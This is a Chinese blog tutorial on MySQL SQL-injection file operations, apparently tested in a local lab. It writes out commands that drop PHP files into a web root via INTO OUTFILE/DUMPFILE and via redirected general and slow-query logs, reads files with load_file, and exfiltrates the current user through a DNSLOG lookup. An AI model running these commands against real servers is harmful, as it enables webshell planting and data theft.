SQL注入文件操作

最新推荐文章于 2024-07-09 10:00:27 发布
最新推荐文章于 2024-07-09 10:00:27 发布
阅读量729 收藏 1
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43936524/article/details/115725425
版权

文章目录

函数写文件

前提条件

1.有网站的绝对路径
2.数据库secure_file_priv包含了写入的路径

  • secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。
  • secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能执行。
  • secure_file_priv 没有值时,表示不限制mysqld在任意目录的导入导出。

3.mysql服务对网站的访问路径有写的权限
4.mysql连接用户有File权限
5.未对SQL语句“转义
outfile,dumpfile后的地址必须以引号包裹

mysql配置文件my.ini中定义了secure_file_priv等配置
mysql权限部分参考MySQL查看用户权限及权限管理

写入函数

OUTFILE
1.如果有多行数据,写文件时会给每行自动加上换行符
2.写文件时会自动将特殊符号转义,如/n会导致数据换行
3.outfile 的路径不能是0x开头或者char转换以后的路径,只能是引号包裹的路径导致写shell时无法通过hex编码或char()来bypass引号转义等
4.文件不能覆盖写入,所以写入文件必须为不存在

select user from mysql.user INTO OUTFILE 'D:\\mysql.txt';

DUMPFILE
1.dumpfile 只能导出一行
2.dumpfile 在写⽂件时会保持⽂件的原⽣格式,适合写二进制文件,如exe文件,udf提权的dll文件
3.dumpfile 的路径不能是0x开头或者char转换以后的路径
4.文件不能覆盖写入,所以写入文件必须为不存在

select '<?php phpinfo();?>' into dumpfile "D:\\phpstudy_pro\\WWW\\mysql.php";

在这里插入图片描述
如果向已经存在的文件中写入则会报错
在这里插入图片描述
一般来说windows系统写入以后即可直接连接,而linux系统下mysql服务向网站目录写入文件受权限影响较大。

日志写文件

前提条件

通过改写日志内容以及日志储存的地址来写文件
利用条件
1.网站可访问的绝对路径
2.mysql连接用户有开启日志记录和修改日志地址的权限
3.mysql服务有向网站路径写文件的权限
4.GPC关闭未对闭合用的引号转义

日志种类

mysql日志种类

  • 错误日志 (记录启动,运行,停止mysql时出现的信息)
  • 查询日志 (记录建立的客户端连接和执行的语句)
  • 慢查询日志 (记录所有执行超过long_query_time秒的所有查询)
  • 二进制日志 (记录所有更改数据的语句,还用于复制,恢复数据库用)
  • 更新日志(二进制日志已经代替了老的更新日志,更新日志在MySQL 5.1中不再使用)

只有查询日志和慢查询日志可以利用

查询日志

查看查询日志信息show variables like "general%";
在这里插入图片描述
开启查询日志权限并改变日志地址
set global general_log = 1;
set global general_log_file = "D:\\phpstudy_pro\\WWW\\mysqllog.php";
尝试执行带有恶意代码的sql语句
select '<?php phpinfo();?>';
可以看出顺利写入日志文件
在这里插入图片描述
日志文件同样在linux中由MySQL服务创建,所以权限限制比较大,Web服务器访问文件时可能因为没有权限导致利用失败。

慢查询日志

慢查询日志是用来记录执行时间超过指定时间的查询语句。
查看日志情况语句show global variables like '%log%';
在这里插入图片描述
slow_query_logslow_query_log_file表示慢日志是否开启以及储存的位置。默认是OFF不开启慢日志的

查看超过多少s会被记录慢查询日志SHOW GLOBAL VARIABLES LIKE 'long%';
在这里插入图片描述
开启慢查询日志,并设定保存路径
set global slow_query_log = 1;
slow_query_log_file = 'D:\phpstudy_pro\WWW\mysql.php';

日志保存的路径可以hex编码

测试延时语句并尝试写入恶意代码
select "<?php phpinfo();?>" from mysql.user where sleep(11);
发现文件被写入恶意内容
在这里插入图片描述

读文件

前提条件

1.有读取文件的绝对路径
2.mysql服务对路径有读的权限
3.mysql连接用户有File权限
4.secure_file_priv的值非NULL或包含了所读文件的绝对路径

读取函数

load_file
采用select load_file('绝对路径')来读取,与outfile/dumpfile不同的是,这里的绝对路径可以hex编码
测试语句
select load_file("D:\phpstudy_pro\WWW\mysql.php");
在这里插入图片描述

DNSLOG

在没有回显的情况下可以利用dns解析的请求带出数据。
可以先从http://dnslog.cn/获得一个地址,再对想要获得数据进行拼接,通过解析记录带出数据。
select load_file(concat('\\\\', user(), '.dnslog'));

参考文章

https://www.freebuf.com/articles/web/244103.html

https://www.freebuf.com/articles/web/184587.html

kit_1
关注
专栏目录
SQL注入读写文件
m0_56578216的博客
08-24 1897
SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。web 应用在服务器上的绝对路径,一般情况下是不知道的。但是系统敏感文件的路径是固定的。secure_file_priv=null,不允许导入导出操作。secure_file_priv=目录名,只允许此目录及子目录下导入导出操作。secure_file_priv= ,不对导入导出操作做限制。
sql注入2————对系统文件操作
网络设备配置-华为
06-04 552
上一篇文档介绍了sql注入的一些原理和查询方式,这一篇算是作为一个拓展思路;并且这里重新介绍一种工具burpsuite,虽然也是利用url提交,但是更简洁一些 burpsuite准备 1、我们现在sql注入界面截断代理,随机提交一个参数;然后转向burp选择正确的请求;然后发送到repeater(如下图); 2、在repeater下选择params可以直接更改参数重复提交验证; 读取文件(假设...
web渗透-SQL注入文件操作
豆豆不在了
03-01 1008
SQL文件操作原理 在判定数据库连接权限的条件下,利用SQL操作函数 SELECT LOAD_FILE('E://test.txt') #下载文件 or SELECT 'nihao' INTO OUTFILE 'E://test1.txt' #上传写入文件 语句对网站服务器进行本地文件操作。 一般只有root连接用户才能进行文件操作。 攻击步骤: 1.获
SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
xiaoganbuaiuk的博客
07-09 2636
SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询
sql注入总结(2)--------导入导出文件操作
Z_Grant的博客
09-10 843
文章目录一,爆出绝对路径二,导出文件(1) load_file()函数三,上传文件(1) into outfile {绝对路径} 一,爆出绝对路径 这个方法有不少,需要花时间去研究学习,但这是文件导入导出的关键步骤 二,导出文件 (1) load_file()函数 Load_file(”file_name“): 使用条件: ①必须有权限读取并且文件必须完全可读 ②欲读取文件必须在服务器上 ③必...
mysql注入如何读取本地文件_如何通过SQL注入获取服务器本地文件
weixin_28843191的博客
01-28 597
写在前面的话SQL注入可以称得上是最臭名昭著的安全漏洞了,而SQL注入漏洞也已经给整个网络世界造成了巨大的破坏。针对SQL漏洞,研究人员也已经开发出了多种不同的利用技术来实施攻击,包括非法访问存储在远程数据库中的数据、从服务器读/写数据、以及通过MSSQL的SA账号完成任意命令执行等等。在这篇文章中,我们准备利用一个存在于文件下载函数中的SQL注入漏洞,我们将利用存在漏洞的SQL语句并从远程服务器...
sql注入技术文档.pdf
04-08
sql注入相关技术文档
关于SQL注入文件读写的方法总结
09-09
最后,文章简要讨论了Oracle数据库中的文件操作。Oracle由于受到PL/SQL的限制,使得文件读写变得较为困难,因此在文章中没有展开讨论。 需要注意的是,文章中提及的技术主要用于描述和分析安全漏洞,并不意味着鼓励...
数据库SqlParameter 的插入操作,防止sql注入的实现代码
01-20
在.NET开发中,数据库操作是常见的任务之一,而防止SQL注入是确保系统安全的重要环节。在给定的代码示例中,使用了`SqlParameter`来实现数据库插入操作,并且有效地防止了SQL注入攻击。以下是对这段代码的详细解析:...
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
metinfo 后台sql注入1
08-03
本文将深入探讨MetInfo 6.1.0版本中的一个SQL注入漏洞,该漏洞存在于app/system/feedback/admin/feedback_admin.class.php文件的第620行。 SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,欺骗...
SQL注入全面讲解技术文档
03-31
SQL注入漏洞全接触 注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上对它的讨论很热烈,所以我在本期专题中为读者揭示SQL攻击的主要原理以及如何防范这种攻击。 全文分为十三章全面的分析sql注入,使您学习的好助手。 目录 1.SQL注入漏洞全接触--入门篇 1 2.SQL注入法攻击一日通 8 3.SQL Server应用程序中的 高级SQL注入 19 4.编写通用的ASP防SQL注入攻击程序 22 5.利用instr()函数防止SQL注入攻击 23 6.跨站式SQL注入技巧 25 7. 防范Sql注入式攻击 27 8.PHP与SQL注入攻击 29 9.SQL注入攻击零距离 30 10.SQL注入技术和跨站脚本攻击的检测 34 11.菜鸟入门级:SQL注入攻击 39 12. SQL注入渗透某网络安全公司的网站全过程 42 13.利用SQL注入2分钟入侵网站全程实录 45
sql注入学习高级篇
12-16
sql注入学习高级篇
学习推荐:超全面SQL注入学习文档
XXR_Beta的博客
07-26 334
学习推荐:超全面SQL注入学习文档MySQL注入学习MSSQL注入学习Oracle注入学习附加功能 本篇文章旨在推荐一个超全面的SQL注入学习网站,要是我刚入门的时候知道就好了[可惜] 传送门:https://websec.ca/kb/sql_injection# 文档优点:知识点细分清楚、简单明了、内容重点突出 文档缺点:全英文描述 个人建议:使用谷歌浏览器自动翻译 MySQL注入学习 MySQL数据库的基础知识、数据库特性,如何测试注入、如何测试数据库版本、如何获取数据、如何绕WAF等都有提及,笔者
利用SQL注入进行文件读写(详细步骤的实现+图)【靶场:sqli-labs/Less-7】
weixin_46709219的博客
12-15 4152
原理啊,成因啊就不再啰嗦了,直接上实现过程。 一)环境: 攻击机:192.168.67.140 目标主机:192.168.67.143 二)实际操作: 利用mysql的读写文件函数进行文件的读取: 在目标主机的(win7-2)E盘下新建一个flag.txt文件,可以通过输入 select load_file("E:\\flag.txt"); 命令读取指定路径下的flag.txt文件的内容: 在实际中通过漏洞利用进行文件读取: 在攻击机(win7-1)中访问存在SQL注入的网站(如目标主机win7-2中的
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 8436
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQl注入之读写文件注入实验报告
Devil_ping的博客
02-10 539
读写文件受到权限影响 secure_file_priv= 代表文件读写没有限制 secure_file_priv=NULL 代表没有读写文件权限 secure_file_priv= d:/phpstudy/mysql/aa 代表只能对该路径下文件进行读写 这个权限在数据库配置文件my.ini里,默认是没有的 读文件 loa...
【网络安全渗透测试零基础入门必知必会】之初识SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了(1)
Libra1313的博客
06-21 896
id=1 基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点 id 类型为数字,在大多数的网页中,诸如查看用户个人信息,查看文章等,大都会使用这种形式的结构传递id等信息,交给后端,查询出数据库中对应的信息,返回给前台。SQL Cookie注入原理主要涉及到攻击者利用Web应用程序对Cookie处理不当的漏洞,通过修改或伪造Cookie中的值,将恶意的SQL代码注入到应用程序的数据库查询中,从而执行非授权的操作或获取未经授权的数据。主要源于应用程序对用户输入的字符型数据没有进行严格的过滤和验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值